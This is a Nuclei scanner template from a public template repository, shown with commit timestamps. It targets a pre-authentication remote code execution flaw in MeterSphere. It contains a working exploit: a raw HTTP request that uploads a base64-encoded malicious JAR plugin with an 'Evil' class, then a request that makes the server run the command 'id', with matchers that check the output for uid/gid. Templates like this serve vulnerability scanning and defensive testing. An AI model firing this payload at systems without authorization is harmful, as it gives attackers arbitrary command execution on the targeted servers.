nuclei-templates/vulnerabilities/metersphere/metersphere-plugin-rce.yaml

59 lines
4.6 KiB
YAML
Raw Normal View History

id: metersphere-plugin-rce
info:
name: MeterSphere Plugin Pre-auth RCE
2022-01-18 05:16:50 +00:00
author: pdteam,y4er
severity: critical
2022-01-18 05:16:50 +00:00
tags: metersphere,rce,intrusive
reference:
- https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/
- https://github.com/metersphere/metersphere
requests:
- raw:
2022-01-18 05:16:50 +00:00
- |
POST /plugin/add HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX
------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jar"
Content-Type: application/octet-stream
{{base64_decode("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")}}
------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json
null
------WebKitFormBoundaryreButJNjkCniQExX--
- |
POST /plugin/customMethod HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"entry":"Evil","request":"id"}
matchers-condition: and
matchers:
- type: word
words:
- '"data":'
- '"success":true'
condition: and
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"